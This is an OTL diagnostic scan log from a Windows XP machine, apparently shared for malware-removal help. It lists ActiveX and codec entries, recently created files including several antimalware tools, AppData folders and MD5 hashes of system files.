ActiveX: {F5776D81-AE53-4935-8E84-B0B283D8BCEF} - Q330994
ActiveX: <{12d0ed0d-0ee0-4f90-8827-78cefb8f4988} - C:\WINDOWS\system32\ieudinit.exe
ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - C:\WINDOWS\inf\unregmp2.exe /ShowWMP
ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\WINDOWS\system32\ie4uinit.exe -UserIconConfig
ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS - RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP
ActiveX: >{881dd1c5-3dcf-431b-b061-f3f88e8be88a} - %systemroot%\system32\shmgrate.exe OCInstallUserConfigOE

Drivers32: msacm.iac2 - C:\WINDOWS\System32\iac25_32.ax (Intel Corporation)
Drivers32: msacm.l3acm - C:\WINDOWS\system32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: msacm.sl_anet - C:\WINDOWS\System32\sl_anet.acm (Sipro Lab Telecom Inc.)
Drivers32: msacm.trspch - C:\WINDOWS\System32\tssoft32.acm (DSP GROUP, INC.)
Drivers32: vidc.cvid - C:\WINDOWS\System32\iccvid.dll (Radius Inc.)
Drivers32: vidc.DIVX - C:\WINDOWS\System32\DivX.dll (DivX, Inc.)
Drivers32: vidc.iv31 - C:\WINDOWS\System32\ir32_32.dll ()
Drivers32: vidc.iv32 - C:\WINDOWS\System32\ir32_32.dll ()
Drivers32: vidc.iv41 - C:\WINDOWS\System32\ir41_32.ax (Intel Corporation)
Drivers32: vidc.iv50 - C:\WINDOWS\System32\ir50_32.dll (Intel Corporation)
Drivers32: vidc.LEAD - C:\WINDOWS\System32\LCodcCMP.dll (LEAD Technologies, Inc.)
Drivers32: vidc.yv12 - C:\WINDOWS\System32\DivX.dll (DivX, Inc.)

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

========== Files/Folders - Created Within 30 Days ==========

[2013/01/18 22:05:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes' Anti-Malware
[2013/01/18 22:05:15 | 000,021,104 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2013/01/18 22:05:15 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware
[2013/01/18 19:57:47 | 000,518,144 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWREG.exe
[2013/01/18 19:57:47 | 000,406,528 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWSC.exe
[2013/01/18 19:57:47 | 000,212,480 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWXCACLS.exe
[2013/01/18 19:57:47 | 000,060,416 | ---- | C] (NirSoft) -- C:\WINDOWS\NIRCMD.exe
[2013/01/18 19:57:31 | 000,000,000 | ---D | C] -- C:\Qoobox
[2013/01/18 19:55:49 | 005,023,971 | R--- | C] (Swearware) -- C:\Documents and Settings\Owner\Desktop\ComboFix.exe
[2013/01/18 19:28:14 | 004,732,416 | ---- | C] (AVAST Software) -- C:\Documents and Settings\Owner\Desktop\aswMBR.exe
[2013/01/18 19:26:54 | 000,000,000 | R--D | C] -- C:\autorun.inf
[2013/01/18 19:09:10 | 000,000,000 | ---D | C] -- C:\_OTL
[2013/01/17 15:46:02 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\Owner\Desktop\OTL.exe
[2013/01/17 11:28:28 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Owner\Recent
[2013/01/15 20:33:34 | 000,000,000 | ---D | C] -- C:\TDSSKiller_Quarantine
[2013/01/15 20:30:54 | 002,213,976 | ---- | C] (Kaspersky Lab ZAO) -- C:\Documents and Settings\Owner\Desktop\tdsskiller.exe
[2013/01/14 19:26:19 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\avast! Free Antivirus
[2013/01/14 19:26:18 | 000,021,256 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2013/01/14 19:26:17 | 000,361,032 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2013/01/14 19:25:48 | 000,035,928 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2013/01/14 19:25:47 | 000,054,232 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2013/01/14 19:25:43 | 000,738,504 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswSnx.sys
[2013/01/14 19:25:41 | 000,097,608 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys
[2013/01/14 19:25:41 | 000,089,752 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswmon.sys
[2013/01/14 19:25:39 | 000,025,256 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys
[2013/01/14 19:23:24 | 000,041,224 | ---- | C] (AVAST Software) -- C:\WINDOWS\avastSS.scr
[2013/01/14 19:23:23 | 000,227,648 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\aswBoot.exe
[2013/01/14 19:21:10 | 000,000,000 | ---D | C] -- C:\Program Files\AVAST Software
[2013/01/14 19:21:10 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\AVAST Software
[2013/01/14 14:23:04 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\Google Chrome
[2013/01/14 14:12:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Owner\Application Data\SUPERAntiSpyware.com
[2013/01/14 14:11:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\SUPERAntiSpyware
[2013/01/10 21:14:52 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2013/01/18 22:54:03 | 000,000,362 | -H-- | M] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2013/01/18 22:25:41 | 000,000,330 | -H-- | M] () -- C:\WINDOWS\tasks\MP Scheduled Scan.job
[2013/01/18 22:23:11 | 000,000,187 | ---- | M] () -- C:\WINDOWS\System\hpsysdrv.DAT
[2013/01/18 22:22:56 | 000,000,882 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2013/01/18 22:22:28 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2013/01/18 22:22:27 | 527,814,656 | -HS- | M] () -- C:\hiberfil.sys
[2013/01/18 22:17:04 | 000,000,886 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2013/01/18 22:05:18 | 000,000,795 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
[2013/01/18 20:21:08 | 000,000,027 | ---- | M] () -- C:\WINDOWS\System32\drivers\etc\hosts
[2013/01/18 19:56:03 | 005,023,971 | R--- | M] (Swearware) -- C:\Documents and Settings\Owner\Desktop\ComboFix.exe
[2013/01/18 19:46:28 | 000,000,512 | ---- | M] () -- C:\Documents and Settings\Owner\Desktop\MBR.dat
[2013/01/18 19:29:25 | 004,732,416 | ---- | M] (AVAST Software) -- C:\Documents and Settings\Owner\Desktop\aswMBR.exe
[2013/01/18 19:24:26 | 000,132,597 | ---- | M] () -- C:\Documents and Settings\Owner\Desktop\Flash_Disinfector.exe
[2013/01/17 15:45:50 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Owner\Desktop\OTL.exe
[2013/01/15 20:31:15 | 002,213,976 | ---- | M] (Kaspersky Lab ZAO) -- C:\Documents and Settings\Owner\Desktop\tdsskiller.exe
[2013/01/15 06:30:30 | 000,001,842 | ---- | M] () -- C:\Documents and Settings\Owner\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2013/01/14 19:26:20 | 000,001,700 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\avast! Free Antivirus.lnk
[2013/01/14 19:25:43 | 000,002,625 | ---- | M] () -- C:\WINDOWS\System32\CONFIG.NT
[2013/01/14 14:23:04 | 000,001,824 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
[2013/01/14 14:11:21 | 000,001,689 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\SUPERAntiSpyware Free Edition.lnk
[2013/01/10 03:19:17 | 000,472,854 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2013/01/10 03:19:17 | 000,079,394 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2013/01/05 23:34:35 | 006,009,856 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mshtml.dll
[2012/12/21 03:18:57 | 000,186,608 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

========== Files Created - No Company Name ==========

[2013/01/18 22:05:18 | 000,000,795 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
[2013/01/18 19:57:47 | 000,256,000 | ---- | C] () -- C:\WINDOWS\PEV.exe
[2013/01/18 19:57:47 | 000,208,896 | ---- | C] () -- C:\WINDOWS\MBR.exe
[2013/01/18 19:57:47 | 000,098,816 | ---- | C] () -- C:\WINDOWS\sed.exe
[2013/01/18 19:57:47 | 000,080,412 | ---- | C] () -- C:\WINDOWS\grep.exe
[2013/01/18 19:57:47 | 000,068,096 | ---- | C] () -- C:\WINDOWS\zip.exe
[2013/01/18 19:46:28 | 000,000,512 | ---- | C] () -- C:\Documents and Settings\Owner\Desktop\MBR.dat
[2013/01/18 19:24:28 | 000,132,597 | ---- | C] () -- C:\Documents and Settings\Owner\Desktop\Flash_Disinfector.exe
[2013/01/16 06:09:36 | 527,814,656 | -HS- | C] () -- C:\hiberfil.sys
[2013/01/14 19:26:20 | 000,001,700 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\avast! Free Antivirus.lnk
[2013/01/14 19:25:47 | 000,000,362 | -H-- | C] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2013/01/14 14:23:04 | 000,001,842 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2013/01/14 14:23:03 | 000,001,824 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
[2013/01/14 14:11:21 | 000,001,689 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\SUPERAntiSpyware Free Edition.lnk
[2012/02/15 01:03:58 | 000,003,072 | ---- | C] () -- C:\WINDOWS\System32\iacenc.dll
[2011/12/21 10:45:18 | 000,000,000 | ---- | C] () -- C:\WINDOWS\SETUP32.INI
[2011/10/19 20:54:03 | 000,103,511 | ---- | C] () -- C:\WINDOWS\hpoins04.dat
[2011/10/19 20:54:03 | 000,017,176 | ---- | C] () -- C:\WINDOWS\hpomdl04.dat
[2011/10/19 16:12:36 | 000,103,511 | ---- | C] () -- C:\WINDOWS\hpoins04.dat.temp
[2011/10/19 16:12:36 | 000,017,176 | ---- | C] () -- C:\WINDOWS\hpomdl04.dat.temp
[2010/12/20 18:27:49 | 000,000,171 | ---- | C] () -- C:\WINDOWS\System32\MRT.INI
[2010/10/22 18:49:43 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\Owner\Local Settings\Application Data\prvlcl.dat
[2010/10/18 00:32:36 | 000,001,324 | ---- | C] () -- C:\WINDOWS\System32\d3d9caps.dat
[2009/12/23 17:13:03 | 000,016,384 | ---- | C] () -- C:\WINDOWS\System32\FileOps.exe
[2009/12/20 19:42:18 | 000,000,314 | ---- | C] () -- C:\WINDOWS\primopdf.ini
[2009/05/30 09:25:34 | 000,116,841 | ---- | C] () -- C:\WINDOWS\hpqins00.dat
[2009/01/28 18:13:14 | 000,000,000 | ---- | C] () -- C:\WINDOWS\hpqEmlSz.INI
[2009/01/03 14:02:57 | 000,012,054 | R--- | C] () -- C:\WINDOWS\hpwscr20.dat
[2008/08/03 15:43:49 | 000,000,051 | ---- | C] () -- C:\WINDOWS\iTouch.ini
[2008/07/09 07:34:50 | 000,394,752 | ---- | C] () -- C:\WINDOWS\System32\diarbp32.exe
[2008/05/25 13:48:56 | 000,000,041 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\.zreglib
[2008/04/30 08:57:22 | 000,000,310 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\APUSet.xml
[2008/04/30 08:57:21 | 000,006,467 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\PrimoPDFSet.xml
[2008/04/30 08:52:10 | 000,176,235 | ---- | C] () -- C:\WINDOWS\System32\Primomonnt.dll
[2008/02/20 20:05:44 | 003,596,288 | ---- | C] () -- C:\WINDOWS\System32\qt-dx331.dll
[2007/12/23 06:30:34 | 000,000,374 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\internaldb6334.dat
[2007/12/23 06:30:27 | 000,000,183 | ---- | C] () -- C:\WINDOWS\wininit.ini
[2007/12/23 06:30:25 | 000,000,555 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\internaldb8467.dat
[2007/12/23 06:30:24 | 000,018,432 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\internaldb41.dat
[2007/11/21 15:58:51 | 000,007,680 | ---- | C] () -- C:\Documents and Settings\Owner\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2007/10/16 11:03:54 | 000,001,522 | ---- | C] () -- C:\WINDOWS\mozver.dat
[2007/10/16 11:02:03 | 000,000,000 | ---- | C] () -- C:\WINDOWS\nsreg.dat
[2007/10/15 07:03:33 | 000,002,154 | ---- | C] () -- C:\WINDOWS\System32\mshrml.ini
[2007/10/15 07:03:32 | 000,002,158 | ---- | C] () -- C:\WINDOWS\System32\ssmute.ini
[2007/10/15 07:03:05 | 000,001,185 | ---- | C] () -- C:\WINDOWS\System32\imbrmute.ini
[2007/10/15 06:17:11 | 000,000,121 | ---- | C] () -- C:\WINDOWS\cdplayer.ini
[2007/10/13 07:01:19 | 000,060,928 | ---- | C] () -- C:\WINDOWS\unleap.exe
[2007/10/13 06:30:08 | 000,204,800 | ---- | C] () -- C:\WINDOWS\System32\IVIresizeW7.dll
[2007/10/13 06:30:08 | 000,200,704 | ---- | C] () -- C:\WINDOWS\System32\IVIresizeA6.dll
[2007/10/13 06:30:08 | 000,192,512 | ---- | C] () -- C:\WINDOWS\System32\IVIresizeP6.dll
[2007/10/13 06:30:08 | 000,192,512 | ---- | C] () -- C:\WINDOWS\System32\IVIresizeM6.dll
[2007/10/13 06:30:08 | 000,188,416 | ---- | C] () -- C:\WINDOWS\System32\IVIresizePX.dll
[2007/10/13 06:30:08 | 000,020,480 | ---- | C] () -- C:\WINDOWS\System32\IVIresize.dll
[2007/10/13 06:18:10 | 000,156,160 | ---- | C] () -- C:\WINDOWS\System32\RTLCPAPI.dll
[2007/10/13 06:07:14 | 000,673,088 | ---- | C] () -- C:\WINDOWS\System32\mlang.dat
[2007/10/13 06:07:14 | 000,046,258 | ---- | C] () -- C:\WINDOWS\System32\mib.bin
[2007/10/13 06:06:07 | 000,218,003 | ---- | C] () -- C:\WINDOWS\System32\dssec.dat
[2007/10/13 06:05:13 | 000,001,804 | ---- | C] () -- C:\WINDOWS\System32\dcache.bin
[2007/10/13 05:33:56 | 000,272,128 | ---- | C] () -- C:\WINDOWS\System32\perfi009.dat
[2007/10/13 05:33:56 | 000,028,626 | ---- | C] () -- C:\WINDOWS\System32\perfd009.dat
[2007/10/13 05:33:53 | 000,004,490 | ---- | C] () -- C:\WINDOWS\System32\oembios.dat
[2007/10/13 05:33:47 | 013,107,200 | ---- | C] () -- C:\WINDOWS\System32\oembios.bin
[2007/10/13 05:33:41 | 000,000,741 | ---- | C] () -- C:\WINDOWS\System32\noise.dat
[2004/08/02 13:20:40 | 000,004,569 | ---- | C] () -- C:\WINDOWS\System32\secupd.dat
[2004/05/13 00:11:55 | 000,000,061 | ---- | C] () -- C:\WINDOWS\smscfg.ini
[2004/05/12 18:44:01 | 000,000,451 | ---- | C] () -- C:\WINDOWS\VGAsetup.ini
[2004/05/12 18:44:01 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\VGAunistlog.ini
[2004/05/12 06:25:14 | 000,028,672 | ---- | C] () -- C:\WINDOWS\System32\JAWTAccessBridge.dll
[2004/05/12 06:24:54 | 000,086,016 | ---- | C] () -- C:\WINDOWS\System32\PcdrKernelModeServices.dll
[2004/05/12 06:24:54 | 000,065,536 | ---- | C] () -- C:\WINDOWS\System32\ProgressTrace.dll
[2004/05/12 06:23:18 | 000,000,128 | ---- | C] () -- C:\Documents and Settings\Owner\Local Settings\Application Data\fusioncache.dat
[2004/05/12 06:21:36 | 000,167,936 | ---- | C] () -- C:\WINDOWS\System32\PCDrJNI_1_1.dll
[2004/05/12 06:10:10 | 000,090,112 | R--- | C] () -- C:\WINDOWS\bwUnin-6.2.3.66.exe
[2004/05/12 06:06:40 | 000,028,764 | ---- | C] () -- C:\WINDOWS\System32\CHODDI.SYS
[2004/05/12 06:06:00 | 000,045,056 | ---- | C] () -- C:\WINDOWS\System32\hpreg.dll
[2004/05/12 05:19:44 | 000,000,376 | ---- | C] () -- C:\WINDOWS\ODBC.INI
[2004/05/12 05:10:15 | 000,000,907 | ---- | C] () -- C:\WINDOWS\QUICKEN.INI
[2004/05/12 03:46:44 | 000,006,848 | ---- | C] () -- C:\WINDOWS\System32\hphmon05.dat
[2004/05/12 03:46:41 | 000,018,341 | ---- | C] () -- C:\WINDOWS\HPHins01.dat
[2004/05/12 03:46:41 | 000,004,308 | ---- | C] () -- C:\WINDOWS\hphmdl01.dat
[2004/05/12 03:34:12 | 000,015,502 | ---- | C] () -- C:\WINDOWS\hpdins01.dat
[2004/05/12 03:34:12 | 000,000,000 | ---- | C] () -- C:\WINDOWS\hpzmdl01.dat
[2004/05/12 03:27:46 | 000,016,306 | ---- | C] () -- C:\WINDOWS\hpqins01.dat
[2004/05/12 03:27:46 | 000,002,673 | ---- | C] () -- C:\WINDOWS\hpimdl01.dat
[2004/05/12 03:21:08 | 000,001,793 | ---- | C] () -- C:\WINDOWS\System32\fxsperf.ini
[2004/05/12 03:14:36 | 000,001,040 | ---- | C] () -- C:\WINDOWS\System32\drivers\alcxinit.dat
[2004/05/12 03:10:51 | 000,065,536 | ---- | C] () -- C:\WINDOWS\System32\sis760.bin
[2004/05/12 03:10:51 | 000,065,536 | ---- | C] () -- C:\WINDOWS\System32\sis741.bin
[2004/05/12 03:10:51 | 000,049,152 | ---- | C] () -- C:\WINDOWS\System32\sis660.bin
[2004/05/12 01:14:25 | 000,363,520 | ---- | C] () -- C:\WINDOWS\System32\psisdecd.dll
[2004/05/12 01:02:57 | 000,299,073 | ---- | C] () -- C:\WINDOWS\System32\PythonCOM22.dll
[2004/05/12 01:02:57 | 000,065,536 | ---- | C] () -- C:\WINDOWS\System32\PyWinTypes22.dll
[2004/05/12 01:00:16 | 000,016,896 | ---- | C] () -- C:\WINDOWS\System32\bcbmm.dll
[2004/05/12 00:28:30 | 000,000,802 | ---- | C] () -- C:\WINDOWS\orun32.ini
[2004/05/12 00:27:04 | 000,002,048 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2004/05/12 00:24:04 | 000,021,640 | ---- | C] () -- C:\WINDOWS\System32\emptyregdb.dat
[2004/05/12 00:16:45 | 000,000,549 | ---- | C] () -- C:\WINDOWS\System32\oeminfo.ini
[2004/05/12 00:16:31 | 000,472,854 | ---- | C] () -- C:\WINDOWS\System32\perfh009.dat
[2004/05/12 00:16:31 | 000,079,394 | ---- | C] () -- C:\WINDOWS\System32\perfc009.dat
[2004/05/11 17:20:40 | 000,004,161 | ---- | C] () -- C:\WINDOWS\ODBCINST.INI
[2004/05/11 17:19:57 | 000,186,608 | ---- | C] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2003/05/15 22:15:18 | 000,225,209 | ---- | C] () -- C:\WINDOWS\System32\C9930A.bin
[2003/03/06 23:53:16 | 000,012,288 | ---- | C] () -- C:\WINDOWS\System32\hpnvr82.dll
[2003/01/07 14:05:08 | 000,002,695 | ---- | C] () -- C:\WINDOWS\System32\OUTLPERF.INI

========== Custom Scans ==========


< DRIVES >

< %SYSTEMDRIVE%\*.exe >

< %systemroot%\assembly\GAC_32\*.ini >

< %systemroot%\assembly\GAC_64\*.ini >

< %SYSTEMDRIVE%\*.exe >

< %ALLUSERSPROFILE%\Application Data\*.exe >

< %APPDATA%\*. >
[2013/01/18 20:20:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Adobe
[2008/05/30 05:31:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\AdobeUM
[2008/06/17 15:51:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Apple Computer
[2010/10/17 10:06:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\AVG10
[2010/12/04 18:22:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Azureus
[2007/10/20 13:53:44 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Ceedo
[2012/12/04 18:47:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Common Files
[2008/05/25 12:50:27 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DAEMON Tools
[2008/05/25 12:41:55 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DAEMON Tools Pro
[2011/12/20 09:27:09 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DDMSettings
[2010/06/07 14:41:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DivX
[2008/09/17 19:14:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DNA
[2007/10/13 15:04:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Google
[2009/03/01 09:40:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Help
[2012/12/04 18:47:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\HP
[2010/10/23 21:57:39 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\HPAppData
[2007/10/13 08:22:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Identities
[2010/11/25 20:18:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Idew
[2007/10/15 07:03:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\InterMute
[2008/08/03 16:02:23 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\InterVideo
[2008/04/17 12:02:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Leadertech
[2007/10/13 06:44:51 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Macromedia
[2008/04/20 21:06:15 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\MagicEffect Photo
[2010/10/25 21:59:08 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Malwarebytes
[2010/10/27 20:47:04 | 000,000,000 | --SD | M] -- C:\Documents and Settings\Owner\Application Data\Microsoft
[2011/03/15 09:49:04 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Motive
[2008/08/27 05:09:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Mozilla
[2010/10/28 07:37:55 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\MSN6
[2008/02/08 15:39:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\MSNInstaller
[2010/11/13 08:37:49 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\PrimoPDF
[2008/07/25 09:35:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Roxio
[2010/05/01 14:54:25 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Safer Networking
[2004/05/12 06:05:09 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\SampleView
[2007/10/13 06:51:17 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\SmartFTP
[2004/05/12 01:27:05 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Sun
[2013/01/14 14:12:03 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\SUPERAntiSpyware.com
[2004/05/12 23:57:50 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Symantec
[2009/02/09 23:37:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Template
[2010/12/22 19:11:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\WinPatrol
[2008/03/25 20:16:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Yahoo!


< MD5 for: ATAPI.SYS >
[2002/08/29 13:00:00 | 010,158,890 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp1.cab:atapi.sys
[2004/08/04 00:05:44 | 018,738,937 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:atapi.sys
[2008/10/17 11:04:56 | 023,852,652 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:atapi.sys
[2002/08/29 06:00:00 | 010,158,890 | ---- | M] () .cab file -- C:\WINDOWS\I386\sp1.cab:atapi.sys
[2004/08/04 00:05:44 | 018,738,937 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp2.cab:atapi.sys
[2008/10/17 11:04:56 | 023,852,652 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp3.cab:atapi.sys
[2004/06/14 10:27:06 | 000,086,912 | ---- | M] (Microsoft Corporation) MD5=95B858761A00E1D4F81F79A0DA019ACA -- C:\WINDOWS\$NtUninstallQ331958$\atapi.sys
[2008/04/13 12:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ERDNT\cache\atapi.sys
[2008/04/13 12:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ServicePackFiles\i386\atapi.sys
[2008/04/13 12:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\system32\drivers\atapi.sys
[2004/08/03 21:59:44 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\$NtServicePackUninstall$\atapi.sys

< MD5 for: CSRSS.EXE >
[2008/04/13 18:12:15 | 000,006,144 | ---- | M] (Microsoft Corporation) MD5=44F275C64738EA2056E3D9580C23B60F -- C:\WINDOWS\ServicePackFiles\i386\csrss.exe
[2008/04/13 18:12:15 | 000,006,144 | ---- | M] (Microsoft Corporation) MD5=44F275C64738EA2056E3D9580C23B60F -- C:\WINDOWS\system32\csrss.exe
[2004/08/03 23:56:50 | 000,006,144 | ---- | M] (Microsoft Corporation) MD5=F12B178B1678D778CFD3FF1FC38C71FB -- C:\WINDOWS\$NtServicePackUninstall$\csrss.exe

< MD5 for: EXPLORER.EXE >
[2008/04/13 18:12:19 | 001,033,728 | ---- | M] (Microsoft Corporation) MD5=12896823FB95BFB3DC9B46BCAEDC9923 -- C:\WINDOWS\ERDNT\cache\explorer.exe
[2008/04/13 18:12:19 | 001,033,728 | ---- | M] (Microsoft Corporation) MD5=12896823FB95BFB3DC9B46BCAEDC9923 -- C:\WINDOWS\explorer.exe
[2008/04/13 18:12:19 | 001,033,728 | ---- | M] (Microsoft Corporation) MD5=12896823FB95BFB3DC9B46BCAEDC9923 -- C:\WINDOWS\ServicePackFiles\i386\explorer.exe
[2007/06/13 05:26:03 | 001,033,216 | ---- | M] (Microsoft Corporation) MD5=7712DF0CDDE3A5AC89843E61CD5B3658 -- C:\WINDOWS\$hf_mig$\KB938828\SP2QFE\explorer.exe
[2007/06/13 04:23:07 | 001,033,216 | ---- | M] (Microsoft Corporation) MD5=97BD6515465659FF8F3B7BE375B2EA87 -- C:\WINDOWS\$NtServicePackUninstall$\explorer.exe
[2004/08/03 23:56:50 | 001,032,192 | ---- | M] (Microsoft Corporation) MD5=A0732187050030AE399B241436565E64 -- C:\WINDOWS\$NtUninstallKB938828$\explorer.exe

< MD5 for: MSWSOCK.DLL >
[2008/06/20 11:41:10 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=097722F235A1FB698BF9234E01B52637 -- C:\WINDOWS\$NtServicePackUninstall$\mswsock.dll
[2008/06/20 11:36:11 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=1DFCA7713EA5A70D5D93B436AEA0317A -- C:\WINDOWS\$hf_mig$\KB951748\SP2QFE\mswsock.dll
